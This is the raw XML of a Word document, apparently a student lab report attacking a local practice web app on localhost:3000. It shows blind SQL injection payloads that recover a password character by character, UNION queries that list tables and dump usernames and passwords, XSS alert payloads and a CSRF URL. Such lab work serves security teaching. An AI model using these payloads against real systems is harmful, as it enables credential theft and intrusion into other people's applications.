                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="492125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="EE0000"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BC8386" w14:textId="67C3C24D" w:rsidR="00FE793F" w:rsidRPr="00FE793F" w:rsidRDefault="00FE793F" w:rsidP="004D7E08">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE793F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Extracting it character by character using binary search on ASCII values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD15044" w14:textId="1742E1A8" w:rsidR="00FE793F" w:rsidRDefault="00FE793F" w:rsidP="004D7E08">
      <w:r w:rsidRPr="00FE793F">
        <w:t xml:space="preserve">For each position, we ask: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE793F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“Is the ASCII value of the character at this position greater than X?”</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE793F">
        <w:t xml:space="preserve"> — narrowing the range (a-z, A-Z, 0-9 all fall within ASCII 48–122) until we identify the exact character.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D740B9" w14:textId="5E74D17C" w:rsidR="00C260F2" w:rsidRDefault="00C260F2" w:rsidP="004D7E08">
      <w:r w:rsidRPr="00C260F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tried payload:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C260F2">
        <w:t xml:space="preserve">admin' AND SUBSTR(password,1,1) &gt; 'm' </w:t>
      </w:r>
      <w:r w:rsidR="009D4A99">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FCF6BE" w14:textId="5EC8AEAF" w:rsidR="00C260F2" w:rsidRDefault="00C260F2" w:rsidP="004D7E08">
      <w:r>
        <w:t>Got: Student Exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3E3826" w14:textId="7EDA851B" w:rsidR="00C260F2" w:rsidRDefault="00C260F2" w:rsidP="004D7E08">
      <w:r>
        <w:t xml:space="preserve">Terminal:   </w:t>
      </w:r>
      <w:r w:rsidRPr="00C260F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20315080" wp14:editId="7EBC8E76">
            <wp:extent cx="5943600" cy="467360"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="27940"/>
            <wp:docPr id="148760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00251" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="467360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700">
                      <a:solidFill>
                        <a:srgbClr val="EE0000"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF6ED7E" w14:textId="68FE51F9" w:rsidR="00C260F2" w:rsidRDefault="002F3217" w:rsidP="004D7E08">
      <w:r>
        <w:t>Character 1 found: “s”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AB6662" w14:textId="5AE7EE98" w:rsidR="002F3217" w:rsidRDefault="002F3217" w:rsidP="004D7E08">
      <w:r w:rsidRPr="002F3217">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB91916" wp14:editId="3E16DA7D">
            <wp:extent cx="5632450" cy="2762250"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="166848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88533" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5632450" cy="2762250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A0C071" w14:textId="49BBD44E" w:rsidR="002F3217" w:rsidRDefault="002F3217" w:rsidP="004D7E08">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Payload for it: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F493E5D" w14:textId="6354413A" w:rsidR="002F3217" w:rsidRDefault="002F3217" w:rsidP="002F3217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3217">
        <w:t xml:space="preserve">admin' AND SUBSTR(password,1,1) &gt; 'm' </w:t>
      </w:r>
      <w:r w:rsidR="00125F01">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Got=exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AA8CAC" w14:textId="787FFB8E" w:rsidR="002F3217" w:rsidRDefault="002F3217" w:rsidP="002F3217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3217">
        <w:t xml:space="preserve">admin' AND SUBSTR(password,1,1) &gt; 's' </w:t>
      </w:r>
      <w:r w:rsidR="00125F01">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   Got= not exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFAB872" w14:textId="07A001B0" w:rsidR="002F3217" w:rsidRDefault="002F3217" w:rsidP="002F3217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3217">
        <w:t xml:space="preserve">admin' AND SUBSTR(password,1,1) &gt; 'p' </w:t>
      </w:r>
      <w:r w:rsidR="00125F01">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Got=exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9A0494" w14:textId="0F7CF4CA" w:rsidR="002F3217" w:rsidRDefault="002F3217" w:rsidP="002F3217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3217">
        <w:t>admin' AND SUBSTR(password,1,1) &gt; '</w:t>
      </w:r>
      <w:r>
        <w:t>q</w:t>
      </w:r>
      <w:r w:rsidRPr="002F3217">
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidR="00125F01">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Got=exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C46977" w14:textId="6DF03C30" w:rsidR="002F3217" w:rsidRDefault="002F3217" w:rsidP="002F3217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3217">
        <w:t>admin' AND SUBSTR(password,1,1) &gt; '</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="002F3217">
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidR="00125F01">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Got=exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FE9BB0" w14:textId="446DBFEB" w:rsidR="002F3217" w:rsidRDefault="002F3217" w:rsidP="002F3217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3217">
        <w:t xml:space="preserve">admin' AND SUBSTR(password,1,1) = 's' </w:t>
      </w:r>
      <w:r w:rsidR="00125F01">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   Got=exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38483348" w14:textId="77777777" w:rsidR="002F3217" w:rsidRDefault="002F3217" w:rsidP="002F3217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012700BE" w14:textId="70623E90" w:rsidR="002F3217" w:rsidRDefault="002F3217" w:rsidP="002F3217">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Advanced:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4CBCD9" w14:textId="4D101EE7" w:rsidR="002F3217" w:rsidRPr="002D7872" w:rsidRDefault="002D7872" w:rsidP="002F3217">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7872">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00AD5D1F" w:rsidRPr="002D7872">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Enumerate the number of columns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B589E0" w14:textId="3B2AC4AC" w:rsidR="00AD5D1F" w:rsidRDefault="00AD5D1F" w:rsidP="002F3217">
      <w:r w:rsidRPr="00AD5D1F">
        <w:t>' ORDER BY 1</w:t>
      </w:r>
      <w:r w:rsidR="00CA023C">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B90B601" w14:textId="3B67FB4F" w:rsidR="00AD5D1F" w:rsidRDefault="00AD5D1F" w:rsidP="002F3217">
      <w:r w:rsidRPr="00AD5D1F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F20CEAF" wp14:editId="2ADF71F7">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="177316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65266" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F63F1CF" w14:textId="202FF557" w:rsidR="00AD5D1F" w:rsidRDefault="00AD5D1F" w:rsidP="002F3217">
      <w:r w:rsidRPr="00AD5D1F">
        <w:t xml:space="preserve">' ORDER BY </w:t>
      </w:r>
      <w:r w:rsidR="006F2DBD">
        <w:t>2--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEB9C47" w14:textId="033DEB68" w:rsidR="00AD5D1F" w:rsidRDefault="00AD5D1F" w:rsidP="002F3217">
      <w:r w:rsidRPr="00AD5D1F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="797CB298" wp14:editId="7F20C1A5">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="21175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3482" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D920F78" w14:textId="4AAAA2D3" w:rsidR="00AD5D1F" w:rsidRDefault="00AD5D1F" w:rsidP="002F3217">
      <w:r w:rsidRPr="00AD5D1F">
        <w:t>' ORDER BY 3</w:t>
      </w:r>
      <w:r w:rsidR="00B240CF">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F43E2E" w14:textId="3BE80023" w:rsidR="00AD5D1F" w:rsidRDefault="00AD5D1F" w:rsidP="002F3217">
      <w:r w:rsidRPr="00AD5D1F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E5A0020" wp14:editId="0B5E2F03">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="194625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50601" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="671F7945" w14:textId="77777777" w:rsidR="00AD5D1F" w:rsidRDefault="00AD5D1F" w:rsidP="002F3217"/>
    <w:p w14:paraId="63BAADEB" w14:textId="3051B58D" w:rsidR="00AD5D1F" w:rsidRDefault="002D7872" w:rsidP="002F3217">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00AD5D1F" w:rsidRPr="00AD5D1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Enumerate table names using sqlite_master</w:t>
      </w:r>
      <w:r w:rsidR="00AD5D1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71C61B" w14:textId="2279CFA7" w:rsidR="00AD5D1F" w:rsidRDefault="007B5B6F" w:rsidP="002F3217">
      <w:r w:rsidRPr="007B5B6F">
        <w:t>' UNION SELECT name, sql FROM sqlite_master</w:t>
      </w:r>
      <w:r w:rsidR="00DC5EEC">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35261D7F" w14:textId="70B8FD98" w:rsidR="007B5B6F" w:rsidRDefault="007B5B6F" w:rsidP="002F3217">
      <w:r w:rsidRPr="007B5B6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03E5A6FC" wp14:editId="60466204">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="197577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76705" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6B47B7" w14:textId="77777777" w:rsidR="002D7872" w:rsidRDefault="002D7872" w:rsidP="002F3217"/>
    <w:p w14:paraId="1BE2EE50" w14:textId="550F3671" w:rsidR="007B5B6F" w:rsidRPr="002D7872" w:rsidRDefault="002D7872" w:rsidP="002D7872">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D7872">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Extract real data (usernames + passwords):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A690315" w14:textId="12EDF806" w:rsidR="002D7872" w:rsidRDefault="006F3B90" w:rsidP="002F3217">
      <w:r w:rsidRPr="006F3B90">
        <w:t>' UNION SELECT username, password FROM users</w:t>
      </w:r>
      <w:r w:rsidR="00B52EBE">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68539EDB" w14:textId="79C09611" w:rsidR="006F3B90" w:rsidRDefault="006F3B90" w:rsidP="002F3217">
      <w:r w:rsidRPr="006F3B90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C49FAB7" wp14:editId="0FCC9632">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="27561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11093" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB0B68E" w14:textId="77777777" w:rsidR="006F3B90" w:rsidRDefault="006F3B90" w:rsidP="002F3217"/>
    <w:p w14:paraId="4C1E43E4" w14:textId="678594F7" w:rsidR="006F3B90" w:rsidRPr="006F3B90" w:rsidRDefault="006F3B90" w:rsidP="006F3B90">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="006F3B90">
        <w:lastRenderedPageBreak/>
        <w:t>Safe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF0D0C3" w14:textId="441928B2" w:rsidR="006F3B90" w:rsidRDefault="00F610F7" w:rsidP="006F3B90">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reflected </w:t>
      </w:r>
      <w:r w:rsidR="006F3B90">
        <w:t>XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E7F086" w14:textId="1E909D1D" w:rsidR="006F3B90" w:rsidRDefault="00381CEE" w:rsidP="006F3B90">
      <w:r>
        <w:t xml:space="preserve">Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00381CEE">
        <w:t>&lt;script&gt;alert('Reflected XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193B95B3" w14:textId="2BA86296" w:rsidR="00381CEE" w:rsidRDefault="00381CEE" w:rsidP="006F3B90">
      <w:r w:rsidRPr="00381CEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75DAE171" wp14:editId="34BAB232">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="147354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44907" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4FFB12" w14:textId="6445CE4D" w:rsidR="00381CEE" w:rsidRDefault="00381CEE" w:rsidP="00381CEE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00381CEE">
        <w:t>Stored XSS</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BB70F2" w14:textId="5E5C7B19" w:rsidR="00381CEE" w:rsidRDefault="00381CEE" w:rsidP="00381CEE">
      <w:r w:rsidRPr="00381CEE">
        <w:t>&lt;script&gt;alert('Stored XSS')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EBFEB1" w14:textId="51837274" w:rsidR="00381CEE" w:rsidRDefault="00381CEE" w:rsidP="00381CEE">
      <w:r w:rsidRPr="00381CEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ACAA0BC" wp14:editId="1BE783A6">
            <wp:extent cx="5943600" cy="2847372"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="128055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56517" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5949626" cy="2850259"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22259EF9" w14:textId="10518AB9" w:rsidR="0067150A" w:rsidRDefault="00086E4A" w:rsidP="00086E4A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00086E4A">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DOM-based XSS:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00086E4A">
        <w:t>http://localhost:3000/dashboard#%3Cimg%20src=x%20onerror=%22alert('DOM%20XSS')%22%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F8AE3A" w14:textId="147AFC61" w:rsidR="00086E4A" w:rsidRDefault="00086E4A" w:rsidP="00086E4A">
      <w:r w:rsidRPr="00086E4A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D30DD52" wp14:editId="502809B2">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="28179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91655" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE3E90" w14:textId="77777777" w:rsidR="00086E4A" w:rsidRDefault="00086E4A" w:rsidP="00086E4A"/>
    <w:p w14:paraId="6DDB119B" w14:textId="1BB90237" w:rsidR="00086E4A" w:rsidRDefault="00086E4A" w:rsidP="00086E4A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00086E4A">
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8967A4" w14:textId="093F4795" w:rsidR="00086E4A" w:rsidRDefault="00086E4A" w:rsidP="00086E4A">
      <w:r w:rsidRPr="00086E4A">
        <w:t>http://localhost:3000/bio-update-csrf?bio=HACKED+AGAIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5D1DA0" w14:textId="41D01FF7" w:rsidR="00086E4A" w:rsidRDefault="00086E4A" w:rsidP="00086E4A">
      <w:r w:rsidRPr="00086E4A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68671960" wp14:editId="2D65E1DF">
            <wp:extent cx="5942137" cy="2870053"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
            <wp:docPr id="158184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48265" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5963640" cy="2880439"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AA7ED5" w14:textId="743A99E3" w:rsidR="00EA3B0E" w:rsidRDefault="0025545C" w:rsidP="00086E4A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FECDC57" w14:textId="7003C577" w:rsidR="0025545C" w:rsidRDefault="0025545C" w:rsidP="00086E4A">
      <w:r>
        <w:t xml:space="preserve">On campus connect terminal run: </w:t>
      </w:r>
      <w:r w:rsidRPr="0025545C">
        <w:t>localhost:3000/dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DF3C2C" w14:textId="1727227E" w:rsidR="0025545C" w:rsidRDefault="0025545C" w:rsidP="00086E4A">
      <w:r w:rsidRPr="0025545C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5362EDE6" wp14:editId="7DF5BEEF">
            <wp:extent cx="5943600" cy="3343275"/>
